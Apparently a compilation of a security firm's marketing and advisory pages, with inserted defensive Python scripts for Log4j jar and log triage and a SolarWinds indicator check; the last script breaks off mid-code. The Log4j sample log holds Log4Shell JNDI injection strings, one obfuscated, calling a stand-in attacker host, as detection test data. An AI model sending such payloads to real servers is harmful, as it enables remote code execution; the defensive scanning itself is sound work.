All large organisations follow the standardized approach laid out in the National Institute of Standards and Technology (NIST) Cybersecurity Framework for their cyber security strategy. This offers guidance on how organization stakeholders can manage and reduce cyber security risk using business drivers: identifying cyber security threats, protecting the digital infrastructure, and detecting malicious activity when it arises can go a long way in protecting companies from cyber attacks.


However, the NIST framework does not exclusively apply to large companies: any company with a good cyber security posture knows that cyber security is not just about protection through antivirus. Whilst SMEs do not have the budget to build their own in-house SOC cyber security team as part of their lines of defense like big companies do, they can outsource these tasks to an independent Digital Forensics and Incident Response company; Blackpanda is one such firm.


How Blackpanda helps SMEs identify, protect, detect, respond and recover from a cyber attack

Blackpanda’s cyber security services offering helps SMEs achieve the cyber capabilities of larger organizations with in-house SOC teams, which carry out Security Information and Event Management (SIEM), threat intelligence, information risk management and Information Assurance (IA) on a daily basis. We help SMEs match this through a combination of cyber defense techniques, including Managed Detection and Response tools (MDR), Compromise Assessments, well-rehearsed Incident Response plans and playbooks, and retainer plans.


Proper cyber hygiene is key to minimizing open digital doors that can be exploited by attackers. Digital hygiene is the easiest starting point for all organizations to begin minimizing vulnerabilities and to improve their cyber security posture. Blackpanda provides cyber consulting services that include a care package to ensure that clients have a clear understanding of what steps to take to improve their cyber hygiene.


Identify

The first step in the NIST framework is to identify cyber threats. Identification is conducted through Endpoint Detection and Response (EDR) tools, which should be top of mind for anyone with a computer. Blackpanda works with the client’s existing EDR or, in the absence of one, installs SentinelOne’s Singularity behavioural EDR on all client endpoints.

Protect

Blackpanda Incident Response Preparation and Consulting services help prepare your organization to defend against and respond to breaches before they occur. Our Incident Response experts work with your team to identify vulnerable assets, draft organizational response plans, and craft bespoke playbooks to common attack events and communications protocols, while thoroughly testing all processes to optimize response. By working closely with our clients, we are able to gain a profound understanding of the company, similarly to how Special Forces conduct terrain analysis before carrying out a mission.

Detect

Thanks to the logs generated by EDR, Blackpanda can gather critical information about the network and perform an initial Compromise Assessment to verify a company’s cyber security posture and eradicate any malware that is present in your network. Having existing malware is not uncommon at all; in fact, 100% of our first-time Compromise Assessments find one or more active malware strains in the client network.

Behavior-driven Compromise Assessments are vital to an organization’s cyber security, given that traditional EDR services monitor computers for malware activity by matching preset queries. Malware, however, is continuously evolving, with new variants generated daily. Traditional EDR lacks the ability to recognise strains of malware that it has not been programmed to seek out. Because of this limitation, cyber attackers are often able to work quietly in the background, operating undetected in networks for as long as several years. As attackers employ sophisticated techniques to conceal their activity and avoid raising suspicion, detecting such ongoing attacks can be highly complex.


For this reason, Blackpanda’s Level 3 Threat Hunting specialists conduct Compromise Assessments with a behavioral approach. Rather than looking for certain known malware, they look for abnormal software behavior and investigate it until they can determine whether it should be treated as a threat or not. Blackpanda Compromise Assessments involve extensive log investigations using a proprietary list of more than 120 advanced threat hunting queries, updated weekly to reflect the most recent and advanced threat intelligence. These queries are designed to uncover suspicious and malicious activities, which, paired with our behavioural searches, allow us to identify highly sophisticated and previously unknown strains of malware.


Further, Compromise Assessment clients can gain eligibility for cyber insurance offerings from select partners, including Pandamatics Underwriting.


Large financial institutions conduct Compromise Assessments daily, but we recommend that smaller companies do them at least once a quarter.


Respond

Blackpanda Digital Forensics and Incident Response specialists are available 24/7 to promptly respond to any cyber attack. In the event of an attack, minimizing dwell time (the time that passes between the start of the breach and its eradication) is crucial to safeguarding the network and reducing the amount of damage an attacker can cause. By calling Blackpanda as soon as you discover a breach, you allow us to support you through the process of incident response and recovery. Whilst we make every effort to respond immediately to everyone who contacts us, to enjoy prioritized response and reduced hourly rates we suggest purchasing an Incident Response and Consulting Services retainer, eliminating delays and ensuring that our team responds immediately to a breach.


When in the middle of a cyber crisis, knowing that you have a specialized team managing incident response and recovery provides peace of mind.


Recover

Due to their lower financial resilience against cyber attacks, SMEs can fall apart after a single breach. Having a sophisticated cyber insurance plan in place is the best way of managing the costs related to cyber security. Pandamatics Underwriting, Asia’s only cyber-only insurance company, is partnered with Blackpanda and backed by the capital strength of Lloyd’s of London. Cyber policies not only cover the costs of incident response, but also the other unexpected expenses that come with facing a cyber attack, including legal, management, PR and cyber security services costs.


Conclusion

SMEs tend to view cyber security as a low-priority item on their checklist, seeing it as an all-or-nothing matter. Most bigger firms and institutions are likely to have an in-house cyber team. However, the recent rise in attacks against both SMEs and big firms has highlighted how important it is for organizations to build cyber resiliency irrespective of size. Preventing cyber breaches and developing a well-prepared cyber strategy can save start-ups and SMEs millions of dollars by avoiding the strict cyber breach penalties that are in place to punish negligence.


Without a strong cyber security posture and an incident response plan in place, one cyber compromise to a SME can be the difference between business as usual and shutting down for good. Ensuring that the company is doing all that it can to protect itself from cyber breaches is crucial in an evolving cyber threat landscape where neglecting ‘the last mile’ can have unforgiving consequences. The good news is, cyber security services can come at a much smaller cost compared to having an in-house SOC team, and there are cyber security services providers like Blackpanda that can help.


Whilst a strong digital infrastructure and good cyber hygiene can protect organizations from up to 90% of cyber risks, they are not sufficient. Attackers are continuously working to find loopholes in the system, and a singular instance of negligence can severely compromise the cyber security of the company. Thus, having a trusted cyber Incident Response partner that can support your organization in covering the last mile of cyber risk is invaluable.

Blackpanda provides bespoke Digital Forensics and Incident Response services to SMEs in the APAC region, with a hyper-focused approach informed by our Special Forces background. SMEs can take cyber security seriously too, and there are options for all business types and sizes.


Blackpanda is Asia’s premier Digital Forensics and Incident Response provider. By contacting us before you are breached, we will be able to help you strengthen your security posture, and we will be promptly available when you fall victim to a cyber attack.

Prepare

VAPT vs compromise assessments

Highlighting the benefits and limitations of VAPT and Compromise Assessments in support of incident response and cyber security preparedness.

Businesses regularly conduct cyber security assessments for a number of reasons, including government and regulatory requirements, corporate compliance audits, or as part of their own responsible data protection policies. However, when it comes to choosing a particular assessment approach, decision makers may be unaware of the differences and advantages between two of the most commonly employed cyber security assessments.

To that end, this article covers the fundamentals of Vulnerability Assessment & Penetration Testing and Compromise Assessments. Both approaches will be compared, and readers will walk away with a better understanding of which evaluation is better suited for their needs.

What is vulnerability assessment and penetration testing (VAPT)?

Vulnerability Assessment & Penetration Testing (VAPT), also known as “penetration testing”, “pen testing”, and “red teaming”, is a preventive exercise aimed at discovering an organization’s cyber security weaknesses and patching them before an attack takes place.

VAPT follows an “outside–in” approach, looking at the company’s systems from an attacker’s perspective, mimicking the actions an attacker might take when approaching the company’s network. The goal of VAPT is to find any security bugs or misconfigurations within a software program or a computer network and highlight where the organization needs to focus its cyber security hardening efforts from a defense structure perspective.

While VAPT is often referred to as a single exercise, the process actually requires two separate phases: “Vulnerability Assessment” (VA) and “Penetration Testing” (PT). Vulnerability Assessments first search for any “open doors” or vulnerabilities that attackers may exploit to penetrate the system. Penetration Testing is then performed by human-led “Red Teams” (or offensive ethical hackers) who use real-world adversary tradecraft and security gaps found in the Vulnerability Assessment phase to attempt to enter the system (whether both “VA” and “PT” are offered in conjunction or as separate services depends on the provider).

VAPT ultimately supports the overall goal of improving an organization’s cyber security by identifying security infrastructure holes to be remediated.

The limitations of VAPT

Whilst VAPT is very good at assessing system defenses, its outside–in approach does not account for any malicious activity already occurring within an environment. In other words, VAPT does not produce any information about what is actually happening within the organization’s systems. For example, VAPT would neither prevent nor detect unauthorized access using stolen but legitimate credentials (such as through a phishing attack, which is the avenue of approach for 95% of all cyber attacks today, according to the SANS Institute).

Additionally, penetration teams are often banned from touching production systems, as this may compromise sensitive information or impact operations. Thus, such systems remain out of the scope of the test and the true havoc an attacker may wreak on a system is not fully assessed. Only through a Compromise Assessment can all the exploited vulnerabilities be caught and patched.

Given the speed at which attacks can spread from one infected endpoint to all network endpoints, early detection of an active intrusion can make the difference between surviving an attack and shutting down operations due to extensive damage. As such, companies may prefer to prioritize regularly scheduled Compromise Assessments as a means of detecting active threats and already-exploited infrastructure gaps — not just theoretical ones.

The benefits of an inside-out approach via compromise assessment

A Compromise Assessment is essentially what an Incident Response firm would do in the event of a breach: an inside–out investigation and security audit of the organization’s internal environment, applications, infrastructures, and endpoints.

Today, as attackers and their methodologies outstrip the abilities of cyber defense, preventative products and services often fail to stop breaches. Conducting a Compromise Assessment proactively applies what would otherwise be the last resort, on the correct assumption that even the most sophisticated cyber security defenses cannot guarantee safety. This philosophy is called “Assumed Breach”, and it is becoming a common framework for viewing cyber security because of the explosion of attacks as adversaries scale their technologies and tactics at an alarming rate since the start of COVID.

With phishing-led attacks on the rise, and 78% of organizations in APAC planning to maintain at least some of the “Work From Home” (WFH) arrangements set out during the COVID-19 outbreak - meaning people are working in environments where endpoints are scattered across different networks - Compromise Assessments should be carried out with higher frequency to ensure the systems are safe from within. Compromise Assessments look at the system from the inside, searching for malware that has attempted or successfully compromised the network to provide insights on which vulnerabilities are being exploited. Results are based on suspicious user behaviors, extensive log review, Indicators of Compromise (IOCs), and any other evidence of malicious activities to identify attackers residing in the current environment (or active in the past).

This is why global financial institutions have internal teams, like Blackpanda’s, conducting Compromise Assessments on a daily basis, as their risk tolerance for being unaware of an active breach is essentially nil. For smaller companies which can assume a higher risk tolerance, Compromise Assessments can be conducted weekly, monthly, or even quarterly, the decision regarding frequency ultimately being a financial cost-benefit analysis for each business. Blackpanda recommends a minimum of quarterly Compromise Assessments in Asia because the average dwell time in the region, or the amount of time it takes a victim to detect an active intrusion, is slightly above 90 days. Conducting Compromise Assessments on a quarterly basis would enable victims to detect an active breach before they would otherwise stumble upon it in a normal dwell time scenario, thus reducing the damage that would otherwise be inflicted.

Carrying out Compromise Assessments through an Incident Response specialist firm like Blackpanda has great advantages when it comes to identifying breaches and backdoors early and kicking them out before they can cause severe financial damage. This way, as soon as an attack is identified during a Compromise Assessment, Blackpanda can immediately begin Incident Response to contain and eradicate the threat. Eliminating threats early and often is key to safeguarding an organization’s cyber health and overall survival, as the dwell time of a cyber attack, or the amount of time to detect an active intrusion, is one of the most important factors in determining the severity of a breach. Catching a fire while it is still a small flame is better than allowing the spark to turn into a raging inferno before noticing it and attempting to address it. Similarly, conducting frequent Compromise Assessments to catch attackers at an early stage, and then transitioning immediately into Incident Response to stamp them out, can significantly limit breach damage.

Recurring Compromise Assessments thus serve as both a preventive and proactive defensive tool, offering a real-time view of an organization’s security posture and the opportunity to promptly respond to any attack before further damage can be done.

Conclusion

Preventive VAPT is important, but outside–in assessments alone can only discover vulnerabilities without verifying whether a system has already been breached. Compromise Assessments offer a more holistic alternative, as they help single out bugs and vulnerabilities in the network, identify opportunities for improvement, and produce information about whether the company is already under attack.

Thanks to their inside-out approach, Compromise Assessments further support Incident Response efforts, helping reduce dwell time by enabling prompt activation of response plans and processes.

Blackpanda security specialists operate both on-site and remotely to conduct Compromise Assessments and evaluate organizations’ security risk by assessing critical assets, networks, and logs with Blackpanda’s proprietary forensics tool, Pandarecon.

To learn more about how proactive cyber security forensics audits can improve your organization’s security posture and fulfill compliance requirements, contact Blackpanda today.

News

Commentary: REvil ransomware strikes again, thousands of SMBs potentially infected

The Kaseya incident is the largest ransomware supply-chain attack to date. How can your organisation best protect itself? 

On Friday, July 2, 2021, before the American Fourth of July long weekend, affiliates of the REvil RaaS (Ransomware-as-a-Service) threat actors executed a supply-chain attack through Kaseya’s remote IT management software, specifically affecting its Virtual System Administrator (VSA).

Kaseya, a software platform designed to help manage IT services remotely, and its affiliated partner researchers, were aware of the exploit and were working on a patch when the REvil ransomware was launched. In a sprint between threat actors and security experts, the bad guys won out before a patch could be implemented.  

The attack affected hundreds and likely thousands of businesses globally with the REvil ransomware demanding USD 70 Million in Bitcoin to restore the encrypted data being held captive. 

The timing was not coincidental as major cyber attacks similar to this one are carefully coordinated to commence around major holidays with threat actors anticipating slower response times and a generally sparse IT staff during the attack.

Kaseya released a statement noting that they immediately disconnected their servers and have maintained communication with all of their 36,000+ clients about the incident. Their actions allowed them to contain their breach to less than 60 clients; however, of those that were affected, more than 30 were MSPs which in turn have thousands of their own clients who could be affected.

Who was affected?

The far-reaching impacts of the attack are still being pieced together as thousands of companies globally were targeted. Some larger retailers like Swedish Coop supermarkets needed to shut down hundreds of stores as their checkout cash register system was taken offline.

CISA and the FBI have released Guidance for MSPs and their customers affected by the Kaseya VSA Supply-Chain Ransomware Attack and encouraged all affected organisations to "follow Kaseya's guidance to shut down VSA servers immediately." Kaseya has also been posting regular updates as to their diligent resolution of this vicious attack.

The Kaseya ransomware attack further highlights the vulnerabilities and potentially catastrophic disruptions that all organisations can be susceptible to, with cyber threat actors growing bolder and more sophisticated at an immeasurable pace. With the increasing level of danger in the cyber world, it’s more important than ever to solidify your organisation’s posture and preparedness against the rising cyber threat.

What can be done to protect your organisation from future cyber threats?

The best time to create an Incident Response Plan to combat a cyber attack is before an attack occurs. To that end, Blackpanda recommends a regular Compromise Assessment that sweeps your internal network and endpoints to ensure it is free of threat actors, signs of compromise, and malware. To find out more about Blackpanda Compromise Assessments, reach out to us via our website or email us at hello@blackpanda.com. 

Protect & Defend

Sophos vulnerability advisory

A remote code execution (RCE) vulnerability (CVE-2022-1040) has been identified in User Portal and Webadmin of Sophos Firewall in versions 18.5 MR3 (18.5.3) and older. The vulnerability has been rated as critical by our cyber security specialists. 

Sophos Firewall software provides network and user endpoint security. 

The exploitation of an RCE vulnerability could allow a malicious actor to remotely install malware or otherwise control the affected device.

Sophos has observed this vulnerability being used to target a small set of specific organisations primarily in the South Asia region. We have informed each of these organisations directly. Sophos will provide further details as we continue to investigate.

How to stay secure

Organisations who use Sophos Firewall versions prior to v18.5 should review their patch status and update to the latest version. 

Sophos has released a security advisory and hotfix for the affected Sophos Firewall versions. Please review the hotfix and implement it as soon as possible.

There is no update action required for Sophos Firewall customers with the "Allow automatic installation of hotfixes" feature enabled. Enabled is the default setting. To confirm that the hotfix has been applied to your firewall, please refer to KB-000043853.

What to do if you believe you may be affected by this vulnerability

Blackpanda incident response experts are monitoring the situation and are prepared to provide assistance and advice as required. 

If you believe that your organisation may have been impacted by this vulnerability, a compromise assessment is the best way to ensure that any threats currently in your network are addressed as soon as possible. 

If you require emergency incident response, please contact Blackpanda immediately.

Protect & Defend

Log4j vulnerability advisory

The Log4j vulnerability has taken the world by storm and internal IT security teams have been caught off guard by the sheer magnitude of this threat to company systems. This “zero-day” remote code execution vulnerability allows attackers to run brute force attacks on vulnerable applications and remotely run malicious code without authentication. This could include malware such as cryptominers and ransomware. 

Log4j Zero-Day Vulnerability advisory

The Log4j vulnerability has taken the world by storm and internal IT security teams have been caught off guard by the sheer magnitude of this threat to company systems. This “zero-day” remote code execution vulnerability allows attackers to run brute force attacks on vulnerable applications and remotely run malicious code without authentication. This could include malware such as cryptominers and ransomware.

Cyber security intelligence provider Check Point has observed 800,000 exploitation attempts in the first 72 hours since the detection of this issue. This means that the time to take action is now, as threat actors continue to make strides in understanding this vulnerability and how they might leverage it for their goals.

In Asia, the situation is no different. Over the past two weeks, Blackpanda has seen a spike in inbound cases, many of which cite Log4j as the principal cause of concern. While incident response services can and should be sought out following a breach, taking pre-emptive steps to ensure your systems' safety is a more cost-effective defensive measure that avoids a reactive scenario.

As a first plan of attack for addressing the Log4j vulnerability, our security experts recommend the following three steps:

1. Apply the latest security patches
Follow the guidance from Apache to apply their latest security update (2.15.0 at the time of writing). Once patched, it is recommended that all users change their passwords. This is also a good time to enable multi-factor authentication if you have not already done so. In the event that you are unable to apply the latest patch, please follow the recommended mitigation measures located at https://logging.apache.org/log4j/2.x/security.html

2. Scan for signs of compromise
Have a suitably qualified member of your IT team or external IT vendor search for any unauthorised code running or potential unauthorised access to systems.

3. Back up data and store offline
It is sensible practice to regularly back up data and store it offline. Now is a sensible time to validate your own backup process and ensure that you have done so recently and will continue to do so regularly.
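Steps 1 and 2 above, carried into a small Python triage script as an added example (this is not Blackpanda's or Apache's code). It assumes that 2.15.0 is the fix version, as the advisory states at the time of writing (the Apache security page linked above lists later releases); that a jar shipping org/apache/logging/log4j/core/lookup/JndiLookup.class bundles log4j-core; and it uses constructed jar files and constructed access-log lines rather than real artefacts. The jar inventory supports the patching step (you cannot patch what you have not found, and shaded application jars hide log4j-core from a file-name search); the log scan supports the "scan for signs of compromise" step by flagging JNDI lookup strings even when they are nested inside other lookups.

```python
"""Log4j triage helpers: jar inventory and access-log scan (added example,
not Blackpanda's or Apache's tooling). Assumes 2.15.0 is the fix version, as
the advisory states at time of writing, and that a jar shipping JndiLookup.class
bundles log4j-core, whose version must then be read from the jar's name."""
import os
import re
import shutil
import tempfile
import zipfile

FIXED_VERSION = (2, 15, 0)   # from the advisory; consult the Apache page for later releases
JAR_NAME = re.compile(r"^log4j-core-(\d+(?:\.\d+)*)\.jar$", re.IGNORECASE)
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
INNERMOST_LOOKUP = re.compile(r"\$\{([^{}]*)\}")

def parse_version(text):
    """'2.14.1' -> (2, 14, 1), padded so that '2.15' compares as 2.15.0."""
    parts = [int(p) for p in text.split(".")]
    return tuple(parts + [0] * (3 - len(parts)))[:3]

def is_vulnerable_version(text):
    return parse_version(text) < FIXED_VERSION

def jar_version(filename):
    """Version from a log4j-core-X.Y.Z.jar file name, else None."""
    m = JAR_NAME.match(os.path.basename(filename))
    return m.group(1) if m else None

def jar_contains_jndi_lookup(path):
    """True when the archive carries JndiLookup.class. Patched releases ship it
    too, so this only says 'log4j-core is in here, now check its version'."""
    try:
        with zipfile.ZipFile(path) as zf:
            return JNDI_CLASS in zf.namelist()
    except zipfile.BadZipFile:
        return False

def inventory(root):
    """(path, version or None, has_jndi_lookup) for every jar/war/ear under root."""
    found = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith((".jar", ".war", ".ear")):
                path = os.path.join(dirpath, fn)
                found.append((path, jar_version(fn), jar_contains_jndi_lookup(path)))
    return found

def classify_jar(version, has_jndi_lookup):
    if version is not None:
        return "vulnerable" if is_vulnerable_version(version) else "patched"
    return "bundles log4j-core, version unknown: inspect" if has_jndi_lookup else "no log4j-core"

def normalize_lookups(text, max_rounds=20):
    """Collapse nested ${...} lookups inside-out; returns (text, jndi_seen)."""
    for _ in range(max_rounds):
        m = INNERMOST_LOOKUP.search(text)
        if not m:
            break
        body = m.group(1)
        if body.lower().startswith("jndi:"):
            return text, True
        # a non-jndi lookup such as ${lower:j}: keep only its argument/default value
        value = body.rsplit(":", 1)[-1].lstrip("-")
        text = text[:m.start()] + value + text[m.end():]
    return text, False

def find_jndi_lookups(lines):
    """Indices of log lines carrying a JNDI lookup once nesting is collapsed."""
    return [i for i, line in enumerate(lines) if normalize_lookups(line)[1]]

# constructed access-log lines, not real traffic
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - [10/Dec/2021:10:02:00 +0000] "GET /?q=${env:HOME} HTTP/1.1" 404 12 "-" "curl/7.79.1"',
]

def demo():
    """Constructed jars (empty placeholder entries, not real bytecode) in a temp dir."""
    tmp = tempfile.mkdtemp()
    try:
        jars = {"log4j-core-2.14.1.jar": [JNDI_CLASS], "log4j-core-2.15.0.jar": [JNDI_CLASS],
                "app-shaded.jar": [JNDI_CLASS, "com/example/App.class"],
                "log4j-api-2.14.1.jar": ["org/apache/logging/log4j/Logger.class"]}
        for name, entries in jars.items():
            with zipfile.ZipFile(os.path.join(tmp, name), "w") as zf:
                for entry in entries:
                    zf.writestr(entry, b"")
        return {os.path.basename(p): classify_jar(v, j) for p, v, j in inventory(tmp)}
    finally:
        shutil.rmtree(tmp, ignore_errors=True)

if __name__ == "__main__":
    for name, verdict in sorted(demo().items()):
        print(f"{name}: {verdict}")
    print("log lines with JNDI lookups:", find_jndi_lookups(SAMPLE_LOG))
```

Run `inventory()` against application roots and container image layers rather than a single directory, and treat the "version unknown" verdict as a to-do, not a pass: a shaded jar needs its embedded pom.properties or the vendor's advisory to pin the log4j-core version. The lookup normaliser is deliberately generous (any non-jndi lookup collapses to its last argument) because the cost of a false positive in triage is a second look, while a missed nested lookup is a missed intrusion attempt.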

Should your team not have the capabilities to perform an internal audit, or should you be seeking the support of seasoned incident response experts, Blackpanda also offers holistic compromise assessment services.

Compromise Assessments

Compromise assessments seek to find attackers who are currently taking a foothold in an environment or that have been active in the recent past. In a similar way to the actions Blackpanda IR specialists take in the event of a breach, compromise assessments are an inside-out investigation and security audit of an organization’s internal environment, applications, infrastructures, and endpoints.

In aid of the growing concern regarding the Log4j vulnerability, Blackpanda compromise assessments offer companies peace of mind by checking every possible point of entry while specifically targeting Java-related applications and use cases to certify the safety of an internal network. With threat actors leveraging the Log4j exploit at an alarming pace, the question companies need to be asking themselves should no longer be “Can I be hacked?”, but instead “Have I been hacked?”.

This is an extremely urgent matter and Blackpanda strongly advises organizations to take appropriate steps to protect their network immediately. If you have any questions or concerns related to this advisory, or are seeking immediate assistance responding to a cyber incident, please reach out directly to hello@blackpanda.com.

Protect & Defend

Solarwinds vulnerability advisory

SolarWinds Orion products (affected versions below) are currently being exploited by malicious actors. This tactic permits an attacker to gain access to network traffic management systems. Disconnecting affected devices, as described in Required Action 2, is the only known mitigation measure currently available.

SolarWinds Vulnerability Advisory

Multiple Vulnerabilities in SolarWinds N-Central Could Allow for Remote Code Execution

This response guide has been developed by Blackpanda following the SolarWinds attack of 11 December 2020.

The guide largely follows advice published in CISA Emergency Directive 21-01 (https://cyber.dhs.gov/ed/21-01/) and Multi-State Information Sharing and Analysis Center (MS-ISAC) Advisory 2020-170 (issued December 18, 2020), and subsequent supplemental updates.

Background

SolarWinds Orion products (affected versions below) are currently being exploited by malicious actors. This tactic permits an attacker to gain access to network traffic management systems. Disconnecting affected devices, as described in Required Action 2, is the only known mitigation measure currently available.

CISA has determined that this exploitation of SolarWinds products poses an unacceptable risk and requires emergency action. This determination is based on:

  • Current exploitation of affected products and their widespread use to monitor traffic on computer network systems;
  • High potential for a compromise of information systems;
  • Grave impact of a successful compromise.

CISA understands that the vendor is working to provide updated software patches. However, companies must wait until CISA provides further guidance before using any forthcoming patches to reinstall the SolarWinds Orion software in their enterprise. Please refer to the MITRE ATT&CK framework for possible tactics the threat actors are using to maintain persistence in the environment.

Systems Affected

SolarWinds N-Central Platform version 12.3 HF4 is affected by the N-Central vulnerabilities described below. The following Orion Platform versions are considered affected versions:

  • Orion Platform 2019.4 HF5, version 2019.4.5200.9083
  • Orion Platform 2020.2 RC1, version 2020.2.100.12219
  • Orion Platform 2020.2 RC2, version 2020.2.5200.12394
  • Orion Platform 2020.2, 2020.2 HF1, version 2020.2.5300.12432

Technical Summary

Multiple vulnerabilities have been discovered in SolarWinds N-Central, two of which could allow for remote code execution when used in conjunction. Details of these vulnerabilities are as follows:

  • An OS command injection vulnerability due to a traversal issue (CVE-2020-25617), which can be used together with CVE-2020-25622 as a one-click root RCE attack chain

  • A local privilege escalation vulnerability (CVE-2020-25618)

  • An unauthorized access vulnerability due to built-in support and admin accounts with default credentials (CVE-2020-25620)

  • An unauthorized access vulnerability due to the authentication mechanism of the local Postgres database (CVE-2020-25621)

  • A CSRF vulnerability in the N-Central Admin Console (CVE-2020-25622), which can be used in conjunction with CVE-2020-25617 for a one-click root RCE attack chain

Successful exploitation of the most severe of these vulnerabilities could allow for remote code execution. Depending on the privileges associated with the user, an attacker could install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Recommendations Overview

We recommend the following actions be taken:

  • Apply appropriate updates provided by SolarWinds to vulnerable systems, immediately after appropriate testing

  • Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack

  • Remind users not to visit untrusted websites or follow links provided by unknown or untrusted sources

  • Inform and educate users regarding the threats posed by hypertext links contained in emails or attachments especially from an untrusted source

  • Apply the Principle of Least Privilege to all systems and services


Detailed Remediation

This emergency directive requires the following actions:

1. Companies that have the expertise to take the following actions immediately must do so before proceeding to Action 2. Companies without this capability shall proceed to Action 2.

a. Forensically image system memory and/or host operating systems hosting all instances of SolarWinds Orion versions 2019.4 through 2020.2.1 HF1. Analyze for new user or service accounts, privileged or otherwise.

b. Analyze stored network traffic for indications of compromise, including new external DNS domains to which a small number of agency hosts (e.g., SolarWinds systems) have had connections.

2. Affected Companies shall immediately disconnect or power down SolarWinds Orion products, versions 2019.4 through 2020.2.1 HF1, from their network. These versions are considered unsafe and should not be used going forward. All other versions from 2020.2 HF2 onwards can be used, if the instance did not previously use an affected version, but still will need to be updated immediately.

Additionally:

a. Block all traffic to and from hosts, external to the enterprise, where any version of SolarWinds Orion software has been installed.

b. Identify and remove all threat actor-controlled accounts and identified persistence mechanisms.

3. By 12pm Eastern Standard Time on Monday December 14, 2020 companies shall report as an incident to CISA (at https://us-cert.cisa.gov/report) the existence of any of the following:

a. [SolarWinds.Orion.Core.BusinessLayer.dll] with a file hash of [b91ce2fa41029f6955bff20079468448]

b. [C:\WINDOWS\SysWOW64\netsetupsvc.dll]

c. Other indicators related to this issue to be shared by CISA

4. After (and only after) all threat actor-controlled accounts and identified persistence mechanisms have been removed: 

a. Treat all hosts monitored by the SolarWinds Orion monitoring software as compromised by threat actors and assume that further persistence mechanisms have been deployed.

b. Rebuild hosts monitored by the SolarWinds Orion monitoring software using trusted sources.

c. Reset all credentials used by or stored in SolarWinds software. Such credentials should be considered compromised.

d. Take actions to remediate kerberoasting, including, as necessary or appropriate, engaging with a third party with experience eradicating APTs from enterprise networks. For Windows environments, refer to the following:

  • See Microsoft’s documentation on kerberoasting: https://techcommunity.microsoft.com/t5/microsoft-security-and/detecting-ldap-based-kerberoasting-with-azure-atp/ba-p/462448

  • Require use of long and complex passwords (greater than 25 characters) for service principal accounts and implement a good rotation policy for these passwords.

  • Replace the user account by a Group Managed Service Account (gMSA). See https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview and Implement Group Managed Service Accounts: https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview.

  • Set account options for service accounts to support AES256_CTS_HMAC_SHA1_96 and not support DES, RC4, or AES 128-bit encryption.

  • Define the Security Policy setting for Network Security: Configure encryption types allowed for Kerberos. Set the allowable encryption types to AES256_HMAC_SHA1 and Future encryption types. https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-configure-encryption-types-allowed-for-kerberos

  • See Microsoft’s documentation on how to reset the Kerberos Ticket Granting Ticket password, twice: https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password

5. By 12pm Eastern Standard Time on Monday, December 14, 2020, submit a report to CISA using the provided template. Department-level Chief Information Officers (CIOs) or equivalents must submit completion reports attesting to CISA that the affected devices were either disconnected or powered down.
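Reporting items 3a and 3b above name two file indicators: a DLL identified by name plus hash, and a DLL identified by path alone. The following Python script is an added example of checking a host for both (it is not Blackpanda's or CISA's tooling). It assumes the 32-hex-character "file hash" quoted above is an MD5 digest, treats netsetupsvc.dll as a hit on presence under a SysWOW64 directory, and demonstrates itself on a constructed directory layout with placeholder files, so the legitimate-looking BusinessLayer DLL it creates is reported as a name match whose hash differs. Item 3c's "other indicators" can be appended to the same list as they are published.

```python
"""File-indicator check for the advisory's reporting items 3a and 3b (added
example, not Blackpanda's or CISA's tooling). Assumes the 32-hex-character
"file hash" quoted above is an MD5 digest, and that netsetupsvc.dll is reported
on presence alone under SysWOW64, since the advisory lists a path, not a hash."""
import hashlib
import os
import shutil
import tempfile

# indicators as the advisory lists them; "parent" is the directory the listed path names
IOCS = [
    {"name": "SolarWinds.Orion.Core.BusinessLayer.dll",
     "md5": "b91ce2fa41029f6955bff20079468448", "parent": None},
    {"name": "netsetupsvc.dll", "md5": None, "parent": "SysWOW64"},
]

def file_md5(path, chunk=1 << 20):
    """Stream the file so a large DLL is not read into memory at once."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()

def classify(name, parent_dir, digest, iocs=IOCS):
    """'hash-match' | 'present' | 'name-only' | None for one file.
    'name-only' is kept because the legitimate DLL exists on every Orion host;
    the digest is what separates the trojanised build from a clean one."""
    for ioc in iocs:
        if name.lower() != ioc["name"].lower():
            continue
        if ioc["parent"] and parent_dir.lower() != ioc["parent"].lower():
            return None          # path-based indicator seen outside its directory
        if ioc["md5"] is None:
            return "present"     # the file's existence at this path is the indicator
        return "hash-match" if digest.lower() == ioc["md5"] else "name-only"
    return None

def scan(roots, iocs=IOCS):
    """Walk roots and return [(verdict, path, md5)] for every hit."""
    names = {ioc["name"].lower() for ioc in iocs}
    hits = []
    for root in roots:
        for dirpath, _, files in os.walk(root):
            for fn in files:
                if fn.lower() not in names:
                    continue
                path = os.path.join(dirpath, fn)
                digest = file_md5(path)
                verdict = classify(fn, os.path.basename(dirpath), digest, iocs)
                if verdict:
                    hits.append((verdict, path, digest))
    return hits

def demo():
    """Constructed host layout in a temp dir; returns sorted (verdict, filename)."""
    tmp = tempfile.mkdtemp()
    try:
        orion = os.path.join(tmp, "Program Files", "SolarWinds", "Orion")
        syswow = os.path.join(tmp, "WINDOWS", "SysWOW64")
        os.makedirs(orion)
        os.makedirs(syswow)
        # constructed bytes: the digest will not equal the advisory's, so name-only
        with open(os.path.join(orion, "SolarWinds.Orion.Core.BusinessLayer.dll"), "wb") as f:
            f.write(b"constructed placeholder, not the real library")
        with open(os.path.join(syswow, "netsetupsvc.dll"), "wb") as f:
            f.write(b"constructed placeholder; presence at this path is the indicator")
        with open(os.path.join(syswow, "kernel32.dll"), "wb") as f:
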